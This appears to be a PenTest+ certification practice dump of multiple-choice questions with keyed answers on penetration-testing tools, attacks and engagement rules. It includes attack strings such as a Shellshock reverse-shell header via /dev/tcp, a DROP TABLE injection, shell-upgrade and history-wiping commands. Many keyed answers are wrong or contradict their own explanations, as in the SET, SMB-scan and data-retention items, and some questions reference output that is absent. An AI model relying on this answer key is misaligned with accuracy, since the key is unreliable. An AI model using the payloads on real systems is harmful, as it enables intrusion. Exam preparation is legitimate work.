PenTest+


An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems. Which of the following is the penetration tester trying to accomplish? (A). Uncover potential criminal activity based on the evidence gathered. (B). Identify all the vulnerabilities in the environment. (C). Limit invasiveness based on scope. (D). Maintain confidentiality of the findings.

(C). Limit invasiveness based on scope.

A penetration tester gives the following command to a systems administrator to execute on one of the target servers: rm -f /var/www/html/G679h32gYu.php Which of the following BEST explains why the penetration tester wants this command executed? (A). To trick the systems administrator into installing a rootkit (B). To close down a reverse shell (C). To remove a web shell after the penetration test (D). To delete credentials the tester created

(C). To remove a web shell after the penetration test

A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test. Which of the following describes the scope of the assessment? (A). Partially known environment testing (B). Known environment testing (C). Unknown environment testing (D). Physical environment testing

(C). Unknown environment testing

A compliance-based penetration test is primarily concerned with: (A). obtaining PII from the protected network. (B). bypassing protection on edge devices. (C). determining the efficacy of a specific set of security standards. (D). obtaining specific information from the protected network.

(C). determining the efficacy of a specific set of security standards.

A CentOS computer was exploited during a penetration test. During initial reconnaissance, the penetration tester discovered that port 25 was open on an internal Sendmail server. To remain stealthy, the tester ran the following command from the attack machine: ssh [email protected] -L5555:10.1.2.:25 Which of the following would be the BEST command to use for further progress into the targeted network? (A). nc 10.10.1.2 (B). ssh 10.10.1.2 (C). nc 127.0.0.1 5555 (D). ssh 127.0.0.1 5555

(C). nc 127.0.0.1 5555

A security engineer identified a new server on the network and wants to scan the host to determine if it is running an approved version of Linux and a patched version of Apache. Which of the following commands will accomplish this task? (A). nmap -f -sV -p80 192.168.1.20 (B). nmap -sS -sL -p80 192.168.1.20 (C). nmap -A -T4 -p80 192.168.1.20 (D). nmap -O -v -p80 192.168.1.20

(C). nmap -A -T4 -p80 192.168.1.20

A penetration tester was able to compromise a web server and move laterally into a Linux web server. The tester now wants to determine the identity of the last user who signed in to the web server. Which of the following log files will show this activity? (A). /var/log/messages (B). /var/log/last_user (C). /var/log/user_log (D). /var/log/lastlog

(D). /var/log/lastlog The /var/log/lastlog file is a log file that stores information about the last user to sign in to the server. This file stores information such as the username, IP address, and timestamp of the last user to sign in to the server. It can be used by a penetration tester to determine the identity of the last user who signed in to the web server, which can be helpful in identifying the user who may have set up the backdoors and other malicious activities.

Which of the following tools would BEST allow a penetration tester to capture wireless handshakes to reveal a Wi-Fi password from a Windows machine? (A). Wireshark (B). EAPHammer (C). Kismet (D). Aircrack-ng

(D). Aircrack-ng The BEST tool to capture wireless handshakes to reveal a Wi-Fi password from a Windows machine is Aircrack-ng. Aircrack-ng is a suite of tools used to assess the security of wireless networks. It starts by capturing wireless network packets [1], then attempts to crack the network password by analyzing them [1].

A penetration tester was hired to perform a physical security assessment of an organization's office. After monitoring the environment for a few hours, the penetration tester notices that some employees go to lunch in a restaurant nearby and leave their belongings unattended on the table while getting food. Which of the following techniques would MOST likely be used to get legitimate access into the organization's building without raising too many alerts? (A). Tailgating (B). Dumpster diving (C). Shoulder surfing (D). Badge cloning

(D). Badge cloning

In the process of active service enumeration, a penetration tester identifies an SMTP daemon running on one of the target company's servers. Which of the following actions would BEST enable the tester to perform phishing in a later stage of the assessment? (A). Test for RFC-defined protocol conformance. (B). Attempt to brute force authentication to the service. (C). Perform a reverse DNS query and match to the service banner. (D). Check for an open relay configuration.

(D). Check for an open relay configuration. SMTP is a protocol associated with mail servers. Therefore, for a penetration tester, an open relay configuration can be exploited to launch phishing attacks.

Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience? (A). Executive summary of the penetration-testing methods used (B). Bill of materials including supplies, subcontracts, and costs incurred during assessment (C). Quantitative impact assessments given a successful software compromise (D). Code context for instances of unsafe type-casting operations

(D). Code context for instances of unsafe type-casting operations

A penetration tester utilized Nmap to scan host 64.13.134.52 and received the following results: Based on the output, which of the following services are MOST likely to be exploited? (Choose two.) (A). Telnet (B). HTTP (C). SMTP (D). DNS (E). NTP (F). SNMP

(B). HTTP (D). DNS

A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company's employees. Which of the following tools can help the tester achieve this goal? (A). Metasploit (B). Hydra (C). SET (D). WPScan

(A). Metasploit

A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a few open ports. To further enumerate, the tester ran another scan using the following command: nmap -O -A -sS -p- 100.100.100.50 Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan? (A). A firewall or IPS blocked the scan. (B). The penetration tester used unsupported flags. (C). The edge network device was disconnected. (D). The scan returned ICMP echo replies.

(A). A firewall or IPS blocked the scan.

Which of the following assessment methods is MOST likely to cause harm to an ICS environment? (A). Active scanning (B). Ping sweep (C). Protocol reversing (D). Packet analysis

(A). Active scanning

A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report? (A). Add a dependency checker into the tool chain. (B). Perform routine static and dynamic analysis of committed code. (C). Validate API security settings before deployment. (D). Perform fuzz testing of compiled binaries.

(A). Add a dependency checker into the tool chain.

A company recruited a penetration tester to configure wireless IDS over the network. Which of the following tools would BEST test the effectiveness of the wireless IDS solutions? (A). Aircrack-ng (B). Wireshark (C). Wifite (D). Kismet

(A). Aircrack-ng

A penetration tester is reviewing the following DNS reconnaissance results for comptia.org from dig:
comptia.org. 3569 IN MX comptia.org-mail.protection.outlook.com.
comptia.org. 3569 IN A 3.219.13.186.
comptia.org. 3569 IN NS ns1.comptia.org.
comptia.org. 3569 IN SOA haven. administrator.comptia.org.
comptia.org. 3569 IN MX new.mx0.comptia.org.
comptia.org. 3569 IN MX new.mx1.comptia.org.
Which of the following potential issues can the penetration tester identify based on this output? (A). At least one of the records is out of scope. (B). There is a duplicate MX record. (C). The NS record is not within the appropriate domain. (D). The SOA record is outside the comptia.org domain.

(A). At least one of the records is out of scope.

When preparing for an engagement with an enterprise organization, which of the following is one of the MOST important items to develop fully prior to beginning the penetration testing activities? (A). Clarify the statement of work. (B). Obtain an asset inventory from the client. (C). Interview all stakeholders. (D). Identify all third parties involved.

(A). Clarify the statement of work.

A penetration tester writes the following script: Which of the following objectives is the tester attempting to achieve? (A). Determine active hosts on the network. (B). Set the TTL of ping packets for stealth. (C). Fill the ARP table of the networked devices. (D). Scan the system on the most used ports.

(A). Determine active hosts on the network.

Which of the following can be used to store alphanumeric data that can be fed into scripts or programs as input to penetration-testing tools? (A). Dictionary (B). Directory (C). Symlink (D). Catalog (E). For-loop

(A). Dictionary

A penetration tester discovers during a recent test that an employee in the accounting department has been making changes to a payment system and redirecting money into a personal bank account. The penetration test was immediately stopped. Which of the following would be the BEST recommendation to prevent this type of activity in the future? (A). Enforce mandatory employee vacations (B). Implement multifactor authentication (C). Install video surveillance equipment in the office (D). Encrypt passwords for bank account information

(A). Enforce mandatory employee vacations If the employee already works in the accounting department, MFA will not stop their actions because they'll already have access by virtue of their job.

A company conducted a simulated phishing attack by sending its employees emails that included a link to a site that mimicked the corporate SSO portal. Eighty percent of the employees who received the email clicked the link and provided their corporate credentials on the fake site. Which of the following recommendations would BEST address this situation? (A). Implement a recurring cybersecurity awareness education program for all users. (B). Implement multifactor authentication on all corporate applications. (C). Restrict employees from web navigation by defining a list of unapproved sites in the corporate proxy. (D). Implement an email security gateway to block spam and malware from email communications.

(A). Implement a recurring cybersecurity awareness education program for all users.

User credentials were captured from a database during an assessment and cracked using rainbow tables. Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database? (A). MD5 (B). bcrypt (C). SHA-1 (D). PBKDF2

(A). MD5

An Nmap network scan has found five open ports with identified services. Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports? (A). OpenVAS (B). Drozer (C). Burp Suite (D). OWASP ZAP

(A). OpenVAS OpenVAS is a full-featured vulnerability scanner. OWASP ZAP and Burp Suite are web application proxies/scanners rather than network vulnerability scanners. Drozer (Android) allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.

Which of the following documents is agreed upon by all parties associated with the penetration-testing engagement and defines the scope, contacts, costs, duration, and deliverables? (A). SOW (B). SLA (C). MSA (D). NDA

(A). SOW

A penetration tester is cleaning up and covering tracks at the conclusion of a penetration test. Which of the following should the tester be sure to remove from the system? (Choose two.) (A). Spawned shells (B). Created user accounts (C). Server logs (D). Administrator accounts (E). Reboot system (F). ARP cache

(A). Spawned shells (B). Created user accounts Removing shells: remove any shell programs installed when performing the pentest. Removing tester-created credentials: remove any credentials created during the pentest, including backdoor accounts. Removing tools: remove any software tools that were installed on the customer's systems to aid in the exploitation of systems.

A penetration tester was brute forcing an internal web server and ran a command that produced the following output: However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed. Which of the following is the MOST likely reason for the lack of output? (A). The HTTP port is not open on the firewall. (B). The tester did not run sudo before the command. (C). The web server is using HTTPS instead of HTTP. (D). This URI returned a server error.

(A). The HTTP port is not open on the firewall.

A company provided the following network scope for a penetration test: 169.137.1.0/24 221.10.1.0/24 149.14.1.0/24 A penetration tester discovered a remote command injection on IP address 149.14.1.24 and exploited the system. Later, the tester learned that this particular IP address belongs to a third party. Which of the following stakeholders is responsible for this mistake? (A). The company that requested the penetration test (B). The penetration testing company (C). The target host's owner (D). The penetration tester (E). The subcontractor supporting the test

(A). The company that requested the penetration test

Which of the following describe the GREATEST concerns about using third-party open-source libraries in application code? (Choose two.) (A). The libraries may be vulnerable (B). The licensing of software is ambiguous (C). The libraries' code bases could be read by anyone (D). The provenance of code is unknown (E). The libraries may be unsupported (F). The libraries may break the application

(A). The libraries may be vulnerable (C). The libraries' code bases could be read by anyone

A penetration tester initiated the transfer of a large data set to verify a proof-of-concept attack as permitted by the ROE. The tester noticed the client's data included PII, which is out of scope, and immediately stopped the transfer. Which of the following MOST likely explains the penetration tester's decision? (A). The tester had the situational awareness to stop the transfer. (B). The tester found evidence of prior compromise within the data set. (C). The tester completed the assigned part of the assessment workflow. (D). The tester reached the end of the assessment time frame.

(A). The tester had the situational awareness to stop the transfer.

Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet? (A). Unsupported operating systems (B). Susceptibility to DDoS attacks (C). Inability to network (D). The existence of default passwords

(A). Unsupported operating systems

A penetration tester is conducting an engagement against an internet-facing web application and planning a phishing campaign. Which of the following is the BEST passive method of obtaining the technical contacts for the website? (A). WHOIS domain lookup (B). Job listing and recruitment ads (C). SSL certificate information (D). Public data breach dumps

(A). WHOIS domain lookup The BEST passive method of obtaining the technical contacts for the website would be a WHOIS domain lookup. WHOIS is a protocol that provides information about registered domain names, such as the registration date, registrant's name and contact information, and the name servers assigned to the domain. By performing a WHOIS lookup, the penetration tester can obtain the contact information of the website's technical staff, which can be used to craft a convincing phishing email.

Given the following output:
User-agent:*
Disallow: /author/
Disallow: /xmlrpc.php
Disallow: /wp-admin
Disallow: /page/
During which of the following activities was this output MOST likely obtained? (A). Website scraping (B). Website cloning (C). Domain enumeration (D). URL enumeration

(A). Website scraping

A penetration tester ran a ping -A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type? (A). Windows (B). Apple (C). Linux (D). Android

(A). Windows

Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner? (A). chmod u+x script.sh (B). chmod u+e script.sh (C). chmod o+e script.sh (D). chmod o+x script.sh

(A). chmod u+x script.sh

A penetration tester is conducting a penetration test. The tester obtains a root-level shell on a Linux server and discovers the following data in a file named password.txt in the /home/svsacct directory: U3VQZXIkM2NyZXQhCg== Which of the following commands should the tester use NEXT to decode the contents of the file? (A). echo U3VQZXIkM2NyZXQhCg== | base64 -d (B). tar zxvf password.txt (C). hydra -l svsacct -p U3VQZXIkM2NyZXQhCg== ssh://192.168.1.0/24 (D). john --wordlist /usr/share/seclists/rockyou.txt password.txt

(A). echo U3VQZXIkM2NyZXQhCg== | base64 -d

A penetration tester runs the following command on a system: find / -user root -perm -4000 -print 2>/dev/null Which of the following is the tester trying to accomplish? (A). Set the SGID on all files in the / directory (B). Find the /root directory on the system (C). Find files with the SUID bit set (D). Find files that were created during exploitation and move them to /dev/null

(C). Find files with the SUID bit set The 2>/dev/null is output redirection: it simply sends all error messages (stderr) to /dev/null, "infinity and beyond", preventing any error messages from appearing in the terminal session.

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"} Which of the following edits should the tester make to the script to determine the user context in which the server is being run? (A). exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"} (B). exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"} (C). exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"} (D). exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}

(A). exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}

A penetration tester logs in as a user in the cloud environment of a company. Which of the following Pacu modules will enable the tester to determine the level of access of the existing user? (A). iam_enum_permissions (B). iam_privesc_scan (C). iam_backdoor_assume_role (D). iam_bruteforce_permissions

(A). iam_enum_permissions

A penetration tester exploited a vulnerability on a server and remotely ran a payload to gain a shell. However, a connection was not established, and no errors were shown on the payload execution. The penetration tester suspected that a network device, like an IPS or next-generation firewall, was dropping the connection. Which of the following payloads are MOST likely to establish a shell successfully? (A). windows/x64/meterpreter/reverse_tcp (B). windows/x64/meterpreter/reverse_http (C). windows/x64/shell_reverse_tcp (D). windows/x64/powershell_reverse_tcp (E). windows/x64/meterpreter/reverse_https

(A). windows/x64/meterpreter/reverse_tcp A reverse tcp connection is usually used to bypass firewall restrictions on open ports. A firewall usually blocks incoming connections on open ports, but does not block outgoing traffic. windows/meterpreter/reverse_tcp allows you to remotely control the file system, sniff, keylog, hashdump, perform network pivoting, control the webcam and microphone, etc.

Which of the following types of assessments MOST likely focuses on vulnerabilities with the objective to access specific data? (A). An unknown-environment assessment (B). A known-environment assessment (C). A red-team assessment (D). A compliance-based assessment

(B). A known-environment assessment A known environment test is often more complete, because testers can get to every system, service, or other target that is in scope and will have credentials and other materials that will allow them to be tested.

A penetration tester has prepared the following phishing email for an upcoming penetration test: Which of the following is the penetration tester using MOST to influence phishing targets to click on the link? (A). Familiarity and likeness (B). Authority and urgency (C). Scarcity and fear (D). Social proof and greed

(B). Authority and urgency

A penetration tester who is performing a physical assessment of a company's security practices notices the company does not have any shredders inside the office building. Which of the following techniques would be BEST to use to gain confidential information? (A). Badge cloning (B). Dumpster diving (C). Tailgating (D). Shoulder surfing

(B). Dumpster diving

A penetration tester conducted a vulnerability scan against a client's critical servers and found the following: Which of the following would be a recommendation for remediation? (A). Deploy a user training program (B). Implement a patch management plan (C). Utilize the secure software development life cycle (D). Configure access controls on each of the servers

(B). Implement a patch management plan

During the scoping phase of an assessment, a client requested that any remote code exploits discovered during testing would be reported immediately so the vulnerability could be fixed as soon as possible. The penetration tester did not agree with this request, and after testing began, the tester discovered a vulnerability and gained internal access to the system. Additionally, this scenario led to a loss of confidential credit card data and a hole in the system. At the end of the test, the penetration tester willfully failed to report this information and left the vulnerability in place. A few months later, the client was breached and credit card data was stolen. After being notified about the breach, which of the following steps should the company take NEXT? (A). Deny that the vulnerability existed (B). Investigate the penetration tester. (C). Accept that the client was right. (D). Fire the penetration tester.

(B). Investigate the penetration tester.

A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following: Which of the following tools will help the tester prepare an attack for this scenario? (A). Hydra and crunch (B). Netcat and cURL (C). Burp Suite and DIRB (D). Nmap and OWASP ZAP

(B). Netcat and cURL

During an internal penetration test against a company, a penetration tester was able to navigate to another part of the network and locate a folder containing customer information such as addresses, phone numbers, and credit card numbers. To be PCI compliant, which of the following should the company have implemented to BEST protect this data? (A). Vulnerability scanning (B). Network segmentation (C). System hardening (D). Intrusion detection

(B). Network segmentation

Which of the following types of information would MOST likely be included in an application security assessment report addressed to developers? (Choose two.) (A). Use of non-optimized sort functions (B). Poor input sanitization (C). Null pointer dereferences (D). Non-compliance with code style guide (E). Use of deprecated Javadoc tags (F). A cyclomatic complexity score of 3

(B). Poor input sanitization (C). Null pointer dereferences

A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment? (A). Smurf (B). Ping flood (C). Fraggle (D). Ping of death

(C). Fraggle A Fraggle attack is the same as a Smurf attack, but it uses the UDP protocol rather than ICMP. Prevention of a Fraggle attack is almost identical to prevention of a Smurf attack.

The results of an Nmap scan are as follows:
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-24 01:10 EST
Nmap scan report for ( 10.2.1.22 )
Host is up (0.0102s latency).
Not shown: 998 filtered ports
Port State Service
80/tcp open http
|_http-title: 80F 22% RH 1009.1MB (text/html)
|_http-slowloris-check:
| VULNERABLE:
| Slowloris DoS Attack
| <..>
Device type: bridge|general purpose
Running (JUST GUESSING) : QEMU (95%)
OS CPE: cpe:/a:qemu:qemu
No exact OS matches found for host (test conditions non-ideal).
OS detection performed. Please report any incorrect results at https://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 107.45 seconds
Which of the following device types will MOST likely have a similar response? (Choose two.) (A). Network device (B). Public-facing web server (C). Active Directory domain controller (D). IoT/embedded device (E). Exposed RDP (F). Print queue

(B). Public-facing web server (D). IoT/embedded device https://www.netscout.com/what-is-ddos/slowloris-attacks From the http-title in the output, this looks like an IoT device with RH implying Relative Humidity, that offers a web-based interface for visualizing the results.

A penetration tester downloaded the following Perl script that can be used to identify vulnerabilities in network switches. However, the script is not working properly. Which of the following changes should the tester apply to make the script work as intended? Example script:
#!/usr/bin/perl
$ip=$argv[1];
attack($ip);
sub attack {
print("x");
}
(A). Change line 2 to $ip= 10.192.168.254; (B). Remove lines 3, 5, and 6. (C). Remove line 6. (D). Move all the lines below line 7 to the top of the script.

(B). Remove lines 3, 5, and 6.

A penetration tester joins the assessment team in the middle of the assessment. The client has asked the team, both verbally and in the scoping document, not to test the production networks. However, the new tester is not aware of this request and proceeds to perform exploits in the production environment. Which of the following would have MOST effectively prevented this misunderstanding? (A). Prohibiting exploitation in the production environment (B). Requiring all testers to review the scoping document carefully (C). Never assessing the production networks (D). Prohibiting testers from joining the team during the assessment

(B). Requiring all testers to review the scoping document carefully

A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider's metadata and get the credentials used by the instance to authenticate itself. Which of the following vulnerabilities has the tester exploited? (A). Cross-site request forgery (B). Server-side request forgery (C). Remote file inclusion (D). Local file inclusion

(B). Server-side request forgery

An Nmap scan of a network switch reveals the following: Which of the following technical controls will most likely be the FIRST recommendation for this device? (A). Encrypted passwords (B). System-hardening techniques (C). Multifactor authentication (D). Network segmentation

(B). System-hardening techniques

During a web application test, a penetration tester was able to navigate to https://company.com and view all links on the web page. After manually reviewing the pages, the tester used a web scanner to automate the search for vulnerabilities. When returning to the web application, the following message appeared in the browser: unauthorized to view this page. Which of the following BEST explains what occurred? (A). The SSL certificates were invalid. (B). The tester IP was blocked. (C). The scanner crashed the system. (D). The web page was not found.

(B). The tester IP was blocked.

A penetration tester is able to use a command injection vulnerability in a web application to get a reverse shell on a system. After running a few commands, the tester runs the following: python -c 'import pty; pty.spawn("/bin/bash")' Which of the following actions is the penetration tester performing? (A). Privilege escalation (B). Upgrading the shell (C). Writing a script for persistence (D). Building a bind shell

(B). Upgrading the shell

A penetration tester obtained the following results after scanning a web server using the dirb utility:
GENERATED WORDS: 4612
---- Scanning URL: http://10.2.10.13/ ----
+ http://10.2.10.13/about (CODE:200|SIZE:1520)
+ http://10.2.10.13/home.html (CODE:200|SIZE:214)
+ http://10.2.10.13/index.html (CODE:200|SIZE:214)
+ http://10.2.10.13/info (CODE:200|SIZE:214)
...
DOWNLOADED: 4612 - FOUND: 4
Which of the following elements is MOST likely to contain useful information for the penetration (A). index.html (B). about (C). info (D). home.html

(B). about

A penetration tester successfully performed an exploit on a host and was able to hop from VLAN 100 to VLAN 200. VLAN 200 contains servers that perform financial transactions, and the penetration tester now wants the local interface of the attacker machine to have a static ARP entry in the local cache. The attacker machine has the following: IP Address: 192.168.1.63 Physical Address: 60-36-dd-a6-c5-33 Which of the following commands would the penetration tester MOST likely use in order to establish a static ARP entry successfully? (A). tcpdump -i eth01 arp and arp[6:2] == 2 (B). arp -s 192.168.1.63 60-36-DD-A6-C5-33 (C). ipconfig /all findstr /v 00-00-00 | findstr Physical (D). route add 192.168.1.63 mask 255.255.255.255.0 192.168.1.1

(B). arp -s 192.168.1.63 60-36-DD-A6-C5-33

An exploit developer is coding a script that submits a very large number of small requests to a web server until the server is compromised. The script must examine each response received and compare the data to a large number of strings to determine which data to submit next. Which of the following data structures should the exploit developer use to make the string comparison and determination as efficient as possible? (A). A list (B). A tree (C). A dictionary (D). An array

(C). A dictionary Data structures are used to store data in an organized form, and some data structures are more efficient and suitable for certain operations than others. For example, hash tables, skip lists and jump lists are dictionary data structures that can insert and access elements efficiently. For string comparison, there are different algorithms that can measure how similar two strings are, such as Levenshtein distance, Hamming distance or Jaccard similarity. Some of these algorithms can be implemented using data structures such as arrays or hash tables.

A penetration tester gains access to a system and establishes persistence, and then runs the following commands:
cat /dev/null > temp
touch -r .bash_history temp
mv temp .bash_history
Which of the following actions is the tester MOST likely performing? (A). Redirecting Bash history to /dev/null (B). Making a copy of the user's Bash history for further enumeration (C). Covering tracks by clearing the Bash history (D). Making decoy files on the system to confuse incident responders

(C). Covering tracks by clearing the Bash history

A security analyst needs to perform a scan for SMB port 445 over a /16 network. Which of the following commands would be the BEST option when stealth is not a concern and the task is time sensitive? (A). Nmap -s 445 -Pn -T5 172.21.0.0/16 (B). Nmap -p 445 -n -T4 -open 172.21.0.0/16 (C). Nmap -sV --script=smb* 172.21.0.0/16 (D). Nmap -p 445 -max -sT 172.21.0.0/16

(C). Nmap -sV --script=smb* 172.21.0.0/16 The best option when stealth is not a concern and the task is time sensitive is to use the command: Nmap -sV --script=smb* 172.21.0.0/16. This command will use version detection and SMB scripts to scan for port 445 on the given IP range. The -sV option will cause Nmap to detect the version of services running on the ports, which is helpful for identifying vulnerabilities, and the --script=smb* option will cause Nmap to run all of the SMB-related scripts. The -T4 option can be used to speed up the scan, as it selects a more aggressive timing template for the probes.

Given the following code: Which of the following are the BEST methods to prevent this type of attack? (Choose two.) (A). Web-application firewall (B). Parameterized queries (C). Output encoding (D). Session tokens (E). Input validation (F). Base64 encoding

(C). Output encoding (E). Input validation Encoding (commonly called "Output Encoding") involves translating special characters into some different but equivalent form that is no longer dangerous in the target interpreter, for example translating the < character into the &lt; string when writing to an HTML page.

A penetration tester conducted an assessment on a web server. The logs from this session show the following: http://www.thecompanydomain.com/servicestatus.php?serviceID=892&serviceID=892 ' ; DROP TABLE SERVICES; -- Which of the following attacks is being attempted? (A). Clickjacking (B). Session hijacking (C). Parameter pollution (D). Cookie hijacking (E). Cross-site scripting

(C). Parameter pollution

A penetration-testing team needs to test the security of electronic records in a company's office. Per the terms of engagement, the penetration test is to be conducted after hours and should not include circumventing the alarm or performing destructive entry. During outside reconnaissance, the team sees an open door from an adjoining building. Which of the following would be allowed under the terms of the engagement? (A). Prying the lock open on the records room (B). Climbing in an open window of the adjoining building (C). Presenting a false employee ID to the night guard (D). Obstructing the motion sensors in the hallway of the records room

(C). Presenting a false employee ID to the night guard "to be conducted after hours and should not include circumventing the alarm or performing destructive entry"

A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client's building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet. Which of the following tools or techniques would BEST support additional reconnaissance? (A). Wardriving (B). Shodan (C). Recon-ng (D). Aircrack-ng

(C). Recon-ng

A software company has hired a penetration tester to perform a penetration test on a database server. The tester has been given a variety of tools used by the company's privacy policy. Which of the following would be the BEST to use to find vulnerabilities on this server? (A). OpenVAS (B). Nikto (C). SQLmap (D). Nessus

(C). SQLmap

A penetration tester has been hired to configure and conduct authenticated scans of all the servers on a software company's network. Which of the following accounts should the tester use to return the MOST results? (A). Root user (B). Local administrator (C). Service (D). Network administrator

(C). Service

A penetration tester is testing input validation on a search form that was discovered on a website. Which of the following characters is the BEST option to test the website for vulnerabilities? (A). Comma (B). Double dash (C). Single quote (D). Semicolon

(C). Single quote

A penetration tester is looking for vulnerabilities within a company's web application that are in scope. The penetration tester discovers a login page and enters the following string in a field: 1;SELECT Username, Password FROM Users; Which of the following injection attacks is the penetration tester using? (A). Blind SQL (B). Boolean SQL (C). Stacked queries (D). Error-based

(C). Stacked queries

A penetration tester is testing a new API for the company's existing services and is preparing the following script: Which of the following would the test discover? (A). Default web configurations (B). Open web ports on a host (C). Supported HTTP methods (D). Listening web servers in a domain

(C). Supported HTTP methods

A penetration tester attempted a DNS poisoning attack. After the attempt, no traffic was seen from the target machine. Which of the following MOST likely caused the attack to fail? (A). The injection was too slow. (B). The DNS information was incorrect. (C). The DNS cache was not refreshed. (D). The client did not receive a trusted response.

(C). The DNS cache was not refreshed.

Which of the following BEST explains why a penetration tester cannot scan a server that was previously scanned successfully? (A). The IP address is wrong. (B). The server is unreachable. (C). The IP address is on the blocklist. (D). The IP address is on the allow list.

(C). The IP address is on the blocklist. The most likely explanation for why a penetration tester cannot scan a server that was previously scanned successfully is that the IP address is on the blocklist. Blocklists are used to prevent malicious actors from scanning servers, and if the IP address of the server is on the blocklist, the scanning process will be blocked.

A penetration tester completed an assessment, removed all artifacts and accounts created during the test, and presented the findings to the client. Which of the following happens NEXT? (A). The penetration tester conducts a retest. (B). The penetration tester deletes all scripts from the client machines. (C). The client applies patches to the systems. (D). The client clears system logs generated during the test.

(C). The client applies patches to the systems.

A Chief Information Security Officer wants a penetration tester to evaluate whether a recently installed firewall is protecting a subnetwork on which many decades-old legacy systems are connected. The penetration tester decides to run an OS discovery and a full port scan to identify all the systems and any potential vulnerability. Which of the following should the penetration tester consider BEFORE running a scan? (A). The timing of the scan (B). The bandwidth limitations (C). The inventory of assets and versions (D). The type of scan

(C). The inventory of assets and versions

A penetration tester is conducting a penetration test and discovers a vulnerability on a web server that is owned by the client. Exploiting the vulnerability allows the tester to open a reverse shell. Enumerating the server for privilege escalation, the tester discovers the following: Which of the following should the penetration tester do NEXT? (A). Close the reverse shell the tester is using. (B). Note this finding for inclusion in the final report. (C). Investigate the high numbered port connections. (D). Contact the client immediately.

(D). Contact the client immediately.

A penetration tester has been hired to examine a website for flaws. During one of the time windows for testing, a network engineer notices a flood of GET requests to the web server, reducing the website's response time by 80%. The network engineer contacts the penetration tester to determine if these GET requests are part of the test. Which of the following BEST describes the purpose of checking with the penetration tester? (A). Situational awareness (B). Rescheduling (C). DDoS defense (D). Deconfliction

(D). Deconfliction Deconfliction is a process that provides a way to separate Red Team activity from real-world activity.

In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: <name-serial_number>. Which of the following would be the best action for the tester to take NEXT with this information? (A). Create a custom password dictionary as preparation for password spray testing. (B). Recommend using a password manager/vault instead of text files to store passwords securely. (C). Recommend configuring password complexity rules in all the systems and applications. (D). Document the unprotected file repository as a finding in the penetration-testing report.

(D). Document the unprotected file repository as a finding in the penetration-testing report.

An assessment has been completed, and all reports and evidence have been turned over to the client. Which of the following should be done NEXT to ensure the confidentiality of the client's information? (A). Follow the established data retention and destruction process (B). Report any findings to regulatory oversight groups (C). Publish the findings after the client reviews the report (D). Encrypt and store any client information for future analysis

(D). Encrypt and store any client information for future analysis After completing an assessment and providing the report and evidence to the client, it is important to follow the established data retention and destruction process to ensure the confidentiality of the client's information. This process typically involves securely deleting or destroying any data collected during the assessment that is no longer needed, and securely storing any data that needs to be retained. This helps to prevent unauthorized access to the client's information and protects the client's confidentiality. Reporting any findings to regulatory oversight groups may be necessary in some cases, but it should be done only with the client's permission and in accordance with any relevant legal requirements. Publishing the findings before the client has reviewed the report is also not recommended, as it may breach the client's confidentiality and damage their reputation. Encrypting and storing client information for future analysis is also not recommended unless it is necessary and in compliance with any legal or ethical requirements.

A red-team tester has been contracted to emulate the threat posed by a malicious insider on a company's network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment. Which of the following actions should the tester take? (A). Perform forensic analysis to isolate the means of compromise and determine attribution. (B). Incorporate the newly identified method of compromise into the red team's approach. (C). Create a detailed document of findings before continuing with the assessment. (D). Halt the assessment and follow the reporting procedures as outlined in the contract.

(D). Halt the assessment and follow the reporting procedures as outlined in the contract.

A penetration tester discovers that a web server within the scope of the engagement has already been compromised with a backdoor. Which of the following should the penetration tester do NEXT? (A). Forensically acquire the backdoor Trojan and perform attribution (B). Utilize the backdoor in support of the engagement (C). Continue the engagement and include the backdoor finding in the final report (D). Inform the customer immediately about the backdoor

(D). Inform the customer immediately about the backdoor

